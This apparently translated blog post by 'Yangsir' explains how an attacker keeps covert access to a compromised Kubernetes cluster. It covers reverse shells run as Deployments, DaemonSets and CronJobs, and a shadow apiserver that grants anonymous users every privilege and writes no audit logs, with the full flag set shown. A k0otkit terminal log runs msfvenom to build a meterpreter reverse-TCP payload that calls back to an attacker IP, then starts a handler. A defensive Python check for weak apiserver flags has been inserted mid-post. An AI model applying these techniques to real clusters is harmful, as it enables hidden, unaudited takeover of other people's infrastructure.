Kubernetes Persistence


Preface

Once a master or a node in a Kubernetes cluster has been obtained by whatever means, how do you maintain access so the compromise can be taken further? Can it be done the way it is on Linux or Windows?

Four methods are covered here.

Controller abuse

When creating containers, using a DaemonSet or a Deployment means the container (and its child containers) is restored and restarted even after being deleted, which gives the persistence effect.

Related concepts:
ReplicationController (RC): ensures that a specified number of Pods are running at any given time

ReplicaSet (RS): RS and Deployment are recommended over RC here; RS and RC are functionally almost identical, the only current difference being that RC only supports equality-based selectors

Deployment: has the same effect and responsibilities as RC and can be understood as an upgraded version of RC

Deployment

Simply write a YAML file for the reverse shell.

node1 and node2 both send back a reverse shell, as follows

If the created pod is deleted in the meantime, the Deployment automatically recreates it, so the reverse shell comes back and persistence is maintained.

DaemonSet

The same steps apply; the shells come back from each node in turn, with the same effect.


Shadow apiserver abuse

The shadow apiserver deployed here has the same functionality as the cluster's existing apiserver, but additionally opens up all Kubernetes privileges, accepts anonymous requests and keeps no logs, which lets an attacker manage the whole cluster without leaving a trace.

Check the current api-server information, as follows

Look for the weak point and confirm it, as follows

Deploy the shadow apiserver directly; the result is as follows

2022/03/31 06:20:04 shadow api-server deploy success!
        shadow api-server pod name:kube-apiserver-master-shadow, namespace:kube-system, node name:master
        listening insecure-port: 0.0.0.0:9443
        listening secure-port: 0.0.0.0:9444     enabled all privilege for system:anonymous user
        go further run `cdk kcurl anonymous get http://your-node-intranet-ip:9443/api` to takeover cluster with none audit logs!

Take another look at the deployed shadow pod to confirm that the shadow apiserver was deployed successfully.

The configuration that implements this is as follows
kube-apiserver
      --advertise-address=192.168.3.19
      --allow-privileged=true
      --authorization-mode=AlwaysAllow
      --client-ca-file=/etc/kubernetes/pki/ca.crt
      --enable-admission-plugins=NodeRestriction
      --enable-bootstrap-token-auth=true
      --etcd-cafile=/etc/kubernetes/pki/etcd/ca.crt
      --etcd-certfile=/etc/kubernetes/pki/apiserver-etcd-client.crt
      --insecure-bind-address=0.0.0.0
      --anonymous-auth=true
      --etcd-keyfile=/etc/kubernetes/pki/apiserver-etcd-client.key
      --etcd-servers=https://127.0.0.1:2379
      --insecure-port=9443
      --kubelet-client-certificate=/etc/kubernetes/pki/apiserver-kubelet-client.crt
      --kubelet-client-key=/etc/kubernetes/pki/apiserver-kubelet-client.key
      --kubelet-preferred-address-types=InternalIP,ExternalIP,Hostname
      --proxy-client-cert-file=/etc/kubernetes/pki/front-proxy-client.crt
      --proxy-client-key-file=/etc/kubernetes/pki/front-proxy-client.key
      --requestheader-allowed-names=front-proxy-client
      --requestheader-client-ca-file=/etc/kubernetes/pki/front-proxy-ca.crt
      --requestheader-extra-headers-prefix=X-Remote-Extra-
      --requestheader-group-headers=X-Remote-Group
      --requestheader-username-headers=X-Remote-User
      --secure-port=9444
      --service-account-key-file=/etc/kubernetes/pki/sa.pub
      --service-cluster-ip-range=10.1.0.0/16
      --tls-cert-file=/etc/kubernetes/pki/apiserver.crt
      --tls-private-key-file=/etc/kubernetes/pki/apiserver.key

Once it is deployed, all subsequent operations can go through this new API.

Retrieve all kinds of token information directly

Likewise, kubectl no longer needs authentication
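A defender-side check for the shadow apiserver pattern above, added here as example code (not from the original post, cdk or k0otkit): it walks a pod list and reports every kube-apiserver container whose flags match the weak settings quoted in the configuration above, plus a second apiserver on the same node. SAMPLE_PODS is a constructed stand-in for the output of `kubectl get pods -n kube-system -o json`.

```python
# Flag values that turn the API server into an unauthenticated, unaudited
# control plane, as in the shadow apiserver configuration quoted above.
WEAK_FLAGS = {
    "--anonymous-auth": lambda v: v == "true",
    "--authorization-mode": lambda v: "AlwaysAllow" in v.split(","),
    "--insecure-port": lambda v: v != "0",
    "--insecure-bind-address": lambda v: v not in ("", "127.0.0.1"),
}

def parse_flags(argv):
    """Turn ['kube-apiserver', '--a=b', '--c'] into {'--a': 'b', '--c': ''}."""
    flags = {}
    for arg in argv:
        if arg.startswith("--"):
            key, _, value = arg.partition("=")
            flags[key] = value
    return flags

def find_weak_apiservers(pod_list):
    """Return [(pod name, node, [weak 'flag=value' strings])] for every
    container running kube-apiserver with at least one weak flag."""
    findings = []
    for pod in pod_list.get("items", []):
        for c in pod["spec"].get("containers", []):
            argv = list(c.get("command", [])) + list(c.get("args", []))
            if not any("kube-apiserver" in a for a in argv):
                continue
            flags = parse_flags(argv)
            bad = [f"{k}={flags[k]}" for k, is_weak in WEAK_FLAGS.items()
                   if k in flags and is_weak(flags[k])]
            if bad:
                findings.append((pod["metadata"]["name"],
                                 pod["spec"].get("nodeName", "?"), bad))
    return findings

SAMPLE_PODS = {"items": [  # constructed: one legitimate apiserver, one shadow
    {"metadata": {"name": "kube-apiserver-master"},
     "spec": {"nodeName": "master", "containers": [{"command": [
         "kube-apiserver", "--authorization-mode=Node,RBAC", "--secure-port=6443"]}]}},
    {"metadata": {"name": "kube-apiserver-master-shadow"},
     "spec": {"nodeName": "master", "containers": [{"command": [
         "kube-apiserver", "--authorization-mode=AlwaysAllow", "--anonymous-auth=true",
         "--insecure-bind-address=0.0.0.0", "--insecure-port=9443", "--secure-port=9444"]}]}},
]}

if __name__ == "__main__":
    for name, node, bad in find_weak_apiservers(SAMPLE_PODS):
        print(f"{name} on {node}: {', '.join(bad)}")
```

Run it against real output by loading the JSON from kubectl into the same dict shape; a second kube-apiserver pod on a node that should only host one is a finding even before the flags are inspected.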

CronJob

Used to run periodic actions; deploying one via YAML gives a periodic reverse shell. Create the YAML for the scheduled job.

The result after creation and the reverse-shell details in the YAML are as follows

K0otkit

Technical details: https://mp.weixin.qq.com/s/H48WNRRtlJil9uLt-O9asw
Project download: https://github.com/Metarget/k0otkit

Download the project, grant execute permission to its files, and modify the IP and port.

Generate k0otkit and then start the reverse-shell listener.

┌──(root💀yangsirrr-github-io)-[~/桌面/k0otkit-main]
└─# ./pre_exp.sh             
+ ATTACKER_IP=192.168.3.11
+ ATTACKER_PORT=20227
+ TEMP_MRT=mrt
+ msfvenom -p linux/x86/meterpreter/reverse_tcp LPORT=20227 LHOST=192.168.3.11 -f elf -o mrt
++ base64 -w 0
++ tr -d '\n'
++ xxd -p mrt
┌──(root💀yangsirrr-github-io)-[~/桌面/k0otkit-main]
└─# ./handle_multi_reverse_shell.sh 
[*] Using configured payload generic/shell_reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
LHOST => 0.0.0.0
LPORT => 4444
ExitOnSession => false
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 0.0.0.0:4444 
msf6 exploit(multi/handler) > 

Upload and run the k0otkit.sh file generated on the attacker machine.

After execution the effect is as follows: the kube-proxy in the kube-system namespace is modified.

The callback looks like this


Author: Yangsir
Reprint policy: Unless otherwise stated, all articles in this blog are licensed under the CC BY 4.0 reprint policy. If reproduced, please credit the source, Yangsir!